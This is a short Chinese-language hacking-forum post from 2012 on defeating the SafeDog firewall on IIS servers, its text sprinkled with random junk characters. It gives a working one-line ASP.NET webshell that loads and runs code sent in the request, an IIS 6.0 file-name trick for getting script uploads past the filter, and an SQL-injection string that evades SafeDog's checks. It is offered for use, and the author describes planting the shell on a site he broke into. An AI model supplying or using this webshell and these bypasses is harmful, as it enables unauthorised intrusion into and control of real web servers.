中国网络渗透测试联盟

标题: 突破安全狗防注入及上传的一些思路 [打印本页]
作者: admin    时间: 2012-10-31 08:25
标题: 突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。
4 x6 D/ Y4 ^+ P3 k) d前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。2 a! u& d" U( E6 f& p
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
/ A) E- y0 v3 c. J+ Q2 E  A6 q
& \3 |# a: B9 D* K' T' P2、IIS6.0解析漏洞遇到安全狗。
% Q4 B: y( U9 Z文件名为. v- k  ?* n1 n& x! H/ D
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
4 g' x* t; x! c! Q, N& Z8 E1 V1 {3 h5 n, o# ?
这样的会被IIS安全狗果断屏蔽。" D1 h$ {" L1 y8 F
改成如下名称,IIS6一样会解析:% @/ B7 H4 _9 G8 T- H
www.xxxxx.com/;1.asp;1.jpg( c/ R: ]0 I  }
6 A" l4 Q8 [' Q1 j, R3 [* N
3、安全狗的注入绕过。% {- f5 c6 F& y# |# o- G) Z: {
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。% K0 f* l+ {9 I3 c8 n7 c2 M' l
但如果:
' x( o0 {$ M' c8 O2 L. \- c& [  Ur00ts.asp?r00ts.com=%00.&id=69%20 and 1=15 x: i2 `% ?3 R* ^8 j
就可以成功绕过了。
4 ]" l0 F$ ]4 U+ Z; r0 r) |& T" D- K: T2 x4 X+ t9 C

: [. c6 P, I) k0 G" }, m



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2